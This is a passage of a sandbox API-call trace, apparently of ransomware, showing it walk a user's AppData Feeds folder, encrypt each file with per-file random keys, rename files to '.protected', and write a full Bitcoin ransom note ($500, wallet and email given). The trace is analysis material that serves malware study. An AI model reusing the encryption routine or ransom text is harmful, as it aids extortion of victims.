[0084.560] StrStrIW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".protected") returned 0x0 [0084.560] lstrcmpW (lpString1="Microsoft at Home~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 [0084.560] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.560] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 107 [0084.560] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".txt") returned 0x0 [0084.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 107 [0084.560] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".rar") returned 0x0 [0084.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 107 [0084.560] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".zip") returned 0x0 [0084.560] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.564] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.564] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.565] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.565] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, 
lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.565] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.565] CloseHandle (hObject=0x150) returned 1 [0084.565] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.protected") returned 117 [0084.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.protected")) returned 1 [0084.566] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.566] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Windows") returned -1 [0084.566] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Program Files") returned -1 [0084.566] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="Program Files (x86)") returned -1 [0084.566] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="$Recycle.bin") returned 1 [0084.566] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2="System Volume Information") returned -1 [0084.566] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft 
at Work~.feed-ms") returned 107 [0084.566] StrStrIW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".protected") returned 0x0 [0084.566] lstrcmpW (lpString1="Microsoft at Work~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 [0084.566] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.566] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 107 [0084.567] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".txt") returned 0x0 [0084.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 107 [0084.567] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".rar") returned 0x0 [0084.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 107 [0084.567] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".zip") returned 0x0 [0084.567] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.572] SetFilePointerEx 
(in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.572] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.573] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.573] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.573] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.573] CloseHandle (hObject=0x150) returned 1 [0084.573] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.protected") returned 117 [0084.573] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.protected")) returned 1 [0084.574] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.574] 
lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Windows") returned -1 [0084.574] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Program Files") returned -1 [0084.574] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="Program Files (x86)") returned -1 [0084.574] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="$Recycle.bin") returned 1 [0084.574] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2="System Volume Information") returned -1 [0084.574] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 100 [0084.574] StrStrIW (lpFirst="MSNBC News~.feed-ms", lpSrch=".protected") returned 0x0 [0084.574] lstrcmpW (lpString1="MSNBC News~.feed-ms", lpString2="RESTORE_FILES.txt") returned -1 [0084.574] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.574] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.575] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 100 [0084.575] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".txt") returned 0x0 [0084.575] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") 
returned 100 [0084.575] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".rar") returned 0x0 [0084.575] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 100 [0084.575] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".zip") returned 0x0 [0084.575] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.580] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.580] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.581] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.581] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.581] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.581] CloseHandle (hObject=0x150) returned 1 [0084.582] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.protected") returned 110 [0084.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC 
News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.protected")) returned 1 [0084.582] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.582] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.582] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\RESTORE_FILES.txt") returned 98 [0084.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.583] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.583] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.583] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.583] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.583] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.583] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.583] CloseHandle (hObject=0x14c) returned 1 [0084.584] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.584] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Windows") returned -1 [0084.584] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Program Files") returned -1 [0084.584] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="Program Files (x86)") returned -1 [0084.584] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="$Recycle.bin") returned 1 [0084.584] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="System Volume Information") returned -1 [0084.584] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 103 [0084.584] lstrcmpW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2=".") returned 1 [0084.584] lstrcmpW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="..") returned 1 [0084.585] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*") returned 105 [0084.585] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.585] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.585] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.585] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.585] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.585] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.585] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\.") returned 105 [0084.585] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.585] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.585] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.585] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.585] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.585] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.585] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.585] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.585] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.585] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.585] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.585] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\..") returned 106 [0084.585] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.585] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.585] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.585] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.585] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.586] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.586] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.586] lstrcmpiW (lpString1="WebSlices~", lpString2="Windows") returned -1 [0084.586] lstrcmpiW (lpString1="WebSlices~", lpString2="Program Files") returned 1 [0084.586] lstrcmpiW (lpString1="WebSlices~", lpString2="Program Files (x86)") returned 1 [0084.586] lstrcmpiW (lpString1="WebSlices~", lpString2="$Recycle.bin") returned 1 [0084.586] lstrcmpiW (lpString1="WebSlices~", lpString2="System Volume Information") returned 1 [0084.586] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 114 [0084.586] lstrcmpW (lpString1="WebSlices~", lpString2=".") returned 1 [0084.586] lstrcmpW (lpString1="WebSlices~", lpString2="..") returned 1 [0084.586] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*") returned 116 [0084.586] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.586] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.586] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.586] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.586] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.586] lstrcmpiW (lpString1=".", 
lpString2="System Volume Information") returned -1 [0084.587] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\.") returned 116 [0084.587] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.587] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.587] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.587] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.587] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.587] CreateFileW 